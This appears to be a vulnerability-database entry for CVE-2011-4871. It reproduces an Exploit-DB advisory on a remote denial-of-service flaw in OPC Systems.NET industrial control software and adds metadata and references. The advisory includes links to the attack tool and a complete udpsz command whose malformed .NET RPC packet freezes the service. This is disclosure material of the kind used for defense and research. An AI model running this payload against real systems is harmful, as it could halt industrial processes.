ID
VAR-E-201110-0085
CVE
| cve_id: | CVE-2011-4871 | Trust: 1.9 |
EDB ID
17965
TITLE
OPC Systems.NET 4.00.0048 - Denial of Service - Windows dos Exploit
Trust: 0.6
DESCRIPTION
OPC Systems.NET 4.00.0048 - Denial of Service. CVE-2011-4871CVE-76404 . dos exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | opc | model: | systems.net | scope: | eq | version: | 4.00.0048 | Trust: 1.0 |
| vendor: | opc | model: | systems.net | scope: | lte | version: | <=4.00.0048 | Trust: 0.6 |
| vendor: | opc | model: | systems opc systems.net | scope: | eq | version: | 4.0.48 | Trust: 0.3 |
| vendor: | opc | model: | systems opc systems.net | scope: | ne | version: | 5.0 | Trust: 0.3 |
EXPLOIT
#######################################################################
Luigi Auriemma
Application: OPC Systems.NET
http://www.opcsystems.com/opc_systems_net.htm
Versions: <= 4.00.0048
Platforms: Windows
Bug: Denial of Service
Exploitation: remote
Date: 10 Oct 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"As a Service Oriented Architecture the OPC Systems Service can connect
to data from OPC Servers, OPC Clients, Visual Studio Applications,
Microsoft Excel, and databases ... breakthrough .NET products for
SCADA, HMI, and plant floor to business solutions to shorten your
development to deployment time."
#######################################################################
======
2) Bug
======
OPCSystemsService.exe can be freezed with CPU at 100% through a
malformed .NET RPC packet.
No additional research performed.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17965.zip
udpsz -l 2000 -c ".NET\1\0\0\0\0\0\xff\xff\xff\xff\4\0\1\1\x25\0\0\0tcp://127.0.0.1/OPC Systems Interface\6\0\1\1" -T SERVER 58723 0x80
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service
Trust: 1.6
CREDITS
Luigi Auriemma
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2011-4871 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 17965 | Trust: 1.6 |
| db: | EDBNET | id: | 40464 | Trust: 0.6 |
| db: | ICS CERT ALERT | id: | ICS-ALERT-11-285-01 | Trust: 0.3 |
| db: | ICS CERT | id: | ICSA-12-012-01 | Trust: 0.3 |
| db: | BID | id: | 50047 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-4871 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/17965/ | Trust: 0.6 |
| url: | http://www.opcsystems.com/opc_systems_net.htm | Trust: 0.3 |
| url: | http://www.us-cert.gov/control_systems/pdf/icsa-12-012-01.pdf | Trust: 0.3 |
| url: | http://www.us-cert.gov/control_systems/pdf/ics-alert-11-285-01.pdf | Trust: 0.3 |
SOURCES
| db: | BID | id: | 50047 |
| db: | EXPLOIT-DB | id: | 17965 |
| db: | EDBNET | id: | 40464 |
LAST UPDATE DATE
2022-07-27T10:01:18.652000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 50047 | date: | 2012-01-27T16:30:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 50047 | date: | 2011-10-11T00:00:00 |
| db: | EXPLOIT-DB | id: | 17965 | date: | 2011-10-10T00:00:00 |
| db: | EDBNET | id: | 40464 | date: | 2011-10-10T00:00:00 |